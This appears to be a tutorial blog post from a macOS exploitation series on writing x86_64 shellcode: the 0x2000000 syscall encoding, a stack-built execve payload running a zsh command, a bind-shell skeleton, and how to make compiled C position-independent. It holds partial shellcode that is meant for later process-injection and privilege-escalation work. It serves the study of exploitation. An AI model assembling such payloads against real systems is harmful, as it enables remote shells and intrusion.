Writing macOS Shellcode From Scratch: Syscalls, Bind Shells, and the 0x2000000 Trick
Shellcode is the payload that runs after the bug. The vulnerability gets you control of execution; the shellcode is what you do with it. On macOS that usually means popping a shell, reverse or bind, but it can be anything: spawn a process, write a file, load a dylib. The constraint that shapes everything is position. Shellcode runs wherever it lands, so it cannot assume a fixed address for itself or anything it touches. No hardcoded pointers, no linker, no loader doing your relocations. Just registers, the stack, and the kernel.
This post builds macOS shellcode from nothing: first the syscall mechanism and the one encoding
quirk that separates macOS from Linux, then a command-execution payload via execve, then a bind
shell, and finally the trickier business of writing shellcode in C and stripping out everything the
compiler adds that would break it. Everything here uses the previous post’s toolkit (DTrace to
confirm the right syscalls fire, LLDB to step the payload) so this is where the reading turns into
writing.
Syscalls and the One Quirk That Matters
A system call is how user code asks the kernel to do something privileged: open a file, create a
socket, replace the running image. To make one on x86_64 you load a syscall number into RAX, put
the arguments in the AMD64 argument registers (RDI, RSI, RDX, R10, R8, R9, in that
order) and execute the syscall instruction.
That much is identical to Linux. Here is what is not. macOS supports several classes of syscall (BSD, Mach, Mach IPC, machine-dependent) and the class is encoded into the number itself. The
class lives in the high bits, shifted left by SYSCALL_CLASS_SHIFT (24). Traditional BSD syscalls, the ones you want for shells and files, carry class 2, which becomes 0x2000000. So the real
number you load into RAX is 0x2000000 + bsd_number.
The BSD numbers come from XNU’s bsd/kern/syscalls.master. A few that matter:
# filename: syscalls.master (excerpt)
1 exit 4 write 30 accept 59 execve
90 dup2 97 socket 98 connect 104 bind 106 listen
So execve is BSD 59 (0x3b), and the value you actually load is 0x200003b. Forget the
0x2000000 and your syscall silently does the wrong thing or faults: it is the single most common
mistake porting Linux shellcode habits to macOS. A minimal payload that writes “hi” and exits:
; filename: hello.asm
mov rax, 0x2000004 ; write (BSD 4 | class 2)
mov rdi, 1 ; fd = stdout
mov rbx, 'hi'
push rbx
mov rsi, rsp ; buf = pointer to "hi" on the stack
mov rdx, 2 ; len = 2
syscall
mov rax, 0x2000001 ; exit (BSD 1 | class 2)
mov rdi, 0
syscall
Notice there is no .data section, no string constant living at a known address. The string “hi”
is pushed onto the stack at runtime and RSI points at it wherever the stack happens to be. That
is the discipline of shellcode in miniature: build your data on the stack, point at it with the
stack pointer, never name an absolute address.
Verify with DTrace, not faith.
syscall:::entry /execname == "yourbinary"/ { printf("%s\n", probefunc); }prints every syscall the payload makes in order. Ifwriteandexitshow up, the encoding is right. If nothing shows up, you got the0x2000000wrong.
Executing a Command With execve
Running an arbitrary command is one syscall: execve(path, argv, envp), which replaces the current
process image with a new one. The clean way to run a shell command is to invoke a shell with -c:
// filename: target-call.c
char *argp[] = { "/bin/zsh", "-c", "touch /tmp/mynewfile.txt", NULL };
execve("/bin/zsh", argp, NULL);
We use /bin/zsh because Apple made zsh the default shell in Catalina; it is reliably present.
execve wants three things in registers: RDI pointing at the path string, RSI pointing at the
argv array, and RDX for envp (which we can leave NULL). The whole job is constructing those
two structures on the stack with no fixed addresses.
The key insight is that the stack grows downward and arrays must be assembled backwards: you
push the last element first. The argv array is NULL-terminated, so NULL goes down first, then a
pointer to the command string, then -c, then /bin/zsh. And each of those pointers has to point
at a string you also placed on the stack. The pattern for one string:
; filename: execve-string.asm
xor rdx, rdx ; RDX = 0, our reusable NULL
push rdx ; NULL-terminate the string on the stack
mov rbx, '/bin/zsh' ; 8 bytes, fits one register
push rbx ; "/bin/zsh\0" now sits on the stack
mov rdi, rsp ; RDI -> the string (execve's first arg)
You repeat that idea for -c and the command, saving each string’s stack address into a temporary
register. Then you build the argv array itself by pushing those saved pointers (NULL first, then
the command pointer, then -c, then /bin/zsh) and point RSI at the top. Load RAX with
0x200003b, fire syscall, and the process becomes your command.
A small but real optimization, because shellcode size sometimes matters: mov rdi, rsp assembles
to three bytes (48 89 e7), while push rsp / pop rdi does the same job in two (54 5f). When
a buffer is tight, those single bytes decide whether the payload fits. When it is not, clarity
wins.
A Bind Shell in Assembly
A command-exec payload is fine when you already have a channel. When you do not, you want a shell
listening on a socket. A bind shell is a sequence of socket syscalls glued to an execve, and
writing it by hand is the best way to internalize how Berkeley sockets actually work at the syscall
level:
socket(AF_INET, SOCK_STREAM, 0), BSD 97, create a TCP socket. The returned file descriptor is the thread you have to keep hold of across every following call; stash it somewhere stable likeR8, becauseRAXgets clobbered by the next syscall.bind(fd, &sockaddr, len), BSD 104, bind it to an address and port. Thesockaddr_instruct (family, port, address) is, again, built on the stack and pointed at. The port is stored in network byte order, so a little-endianmovneeds the bytes swapped.listen(fd, backlog), BSD 106, start accepting connections.accept(fd, 0, 0), BSD 30, block until a client connects; this returns a new fd for the connection.dup2(clientfd, n)fornin 0, 1, 2, BSD 90, wire the client socket onto stdin, stdout, and stderr. This is the step that makes the eventual shell actually talk over the network.execve("/bin/zsh",...), and now zsh reads from and writes to the socket.
; filename: bindshell-skeleton.asm
; socket(AF_INET=2, SOCK_STREAM=1, 0)
mov rax, 0x2000061 ; socket (BSD 97)
mov rdi, 2
mov rsi, 1
xor rdx, rdx
syscall
mov r8, rax ; save the listening fd before RAX is reused
; ... bind, listen, accept ...
; dup2 loop wiring the client fd to fds 0,1,2
; execve /bin/zsh
The discipline that makes or breaks this is file-descriptor bookkeeping. Every syscall returns into
RAX, so the socket fd you got from socket is gone the instant you call bind. Save it first.
The same applies to the client fd from accept. Most broken bind shells are not broken
cryptography or alignment: they are a clobbered file descriptor. Step it in LLDB and watch R8.
Shellcode in C, and Fighting the Compiler
Hand-assembly is precise but slow and error-prone. Writing the logic in C and compiling it is faster, but a compiler emits code that assumes it is a normal program, and several of those assumptions are fatal to shellcode. The work is in stripping them out.
Two big ones on macOS x86_64:
RIP-relative addressing. When C references a global string or variable, the compiler emits a
load relative to the instruction pointer: lea rax, [rip + offset]. That is great for a normal
binary the loader places at a known base, and useless for shellcode that runs at an unknown
address, because the offset was computed for the original layout. The fix is to eliminate
RIP-relative references entirely: keep data on the stack instead of in global sections, exactly
like the assembly version does. No globals, no __DATA strings, nothing the compiler would address
relative to RIP.
Calls into the __stub section. Call a libc function like execv from C and the compiler
routes the call through a stub that the dynamic linker fixes up at load time. In shellcode there is
no linker pass, so the stub is a dangling jump. The workaround is to bypass the stub and call the
function directly: locate the real execv pointer (the same way the assembly payload would resolve
an address) and call through it, so the path never touches the __stub indirection.
// filename: c-shellcode-notes.c
// Compile with optimizations and no stack protector, then extract __text.
// Then audit the disassembly for two things that must NOT appear:
// - any lea reg, [rip + ...] (RIP-relative data reference)
// - any call <stub> (lazy-bound import)
// If either survives, the payload breaks the moment it runs relocated.
The honest summary: writing shellcode in C does not save you from understanding the assembly: it
just changes your job from writing it to auditing it. You compile, disassemble, find the
constructs the compiler added that assume a loader, and surgically remove them until the __text
section is genuinely position-independent. That review loop is its own skill, and it is where most
of the time goes.
Why This Matters
Everything in this post is plumbing for the rest of the series. The injection posts (DYLD,
dylib hijacking, Mach task ports) all need a payload to inject, and that payload is shellcode
built on exactly these rules: position-independent, stack-constructed, 0x2000000-encoded. The
BlockBlock case study later injects execv shellcode into a security product’s process; the
shellcode it injects is the kind we just built. When a privilege-escalation chain ends in “and then
we run our payload as root,” this is the payload.
The deeper point is the mindset. Shellcode forces you to think about code with no fixed address, data you carry with you, and a kernel interface you talk to in raw register conventions. That same discipline (assume nothing about layout, build what you need at runtime, verify with DTrace) is the discipline of every exploit that follows. Next we use it: getting a payload into a process we do not own, starting with the oldest trick in the macOS book, dylib injection.
References
- Apple / XNU. bsd/kern/syscalls.master, osfmk/mach/i386/syscall_sw.h, XNU 7195.50.7.100.1. opensource.apple.com.
- AMD64 ABI. System V Application Binary Interface, x86-64 calling convention.